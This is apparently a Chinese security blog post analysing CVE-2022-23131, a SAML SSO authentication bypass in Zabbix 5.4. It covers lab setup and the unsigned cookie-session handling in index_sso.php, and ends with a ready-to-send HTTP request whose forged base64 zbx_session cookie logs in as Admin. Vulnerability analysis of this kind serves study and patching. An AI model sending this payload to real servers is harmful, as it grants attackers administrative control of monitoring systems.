zabbix_CVE-2022-23131_saml-sso鉴权绕过

CVE-2022-23131

环境搭建:

  1. zabbix5.4的虚拟机:

    https://cdn.zabbix.com/zabbix/appliances/stable/5.4/5.4.8/zabbix_appliance-5.4.8-vmx.tar.gz

  2. 配置saml sso登录:

    https://www.bookstack.cn/read/zabbix-5.0-zh/4913494851f19cb1.md

漏洞分析:

zabbixsession的处理是自定义的,如这里CCookieSession中自定义session的处理方式

image-20220223100824367

比如读取,是从cookiebase64->json_decode后存入$_SESSION

image-20220223100918932

image-20220223101009770

比如提取sessionid,也是同样的道理

image-20220223101229754

CEncryptedCookieSession继承了CCookieSession,并重写了提取sessionidextractSessionId方法,并加了一个校验checkSign

image-20220223100426276

image-20220223100615854

而在index_sso.php中,这里没做任何校验,把$_SESSION['saml_data']的值拿来并用里面的username_attribute作为username来查询,如果$data有值那么就直接设置一个sessionid获取权限。因为上面session的读取存储是通过CCookieSession#read完成的,所以这里$_SESSION['saml_data']可控,也就绕过了鉴权

image-20220223101926340

payload

GET /index_sso.php HTTP/1.1
Host: 192.168.196.131
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
Connection: close

image-20220223103821925

参考:https://y4er.com/post/cve-2022-23131-zabbix-web-frontend-bypassing-the-saml-sso-authentication/

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇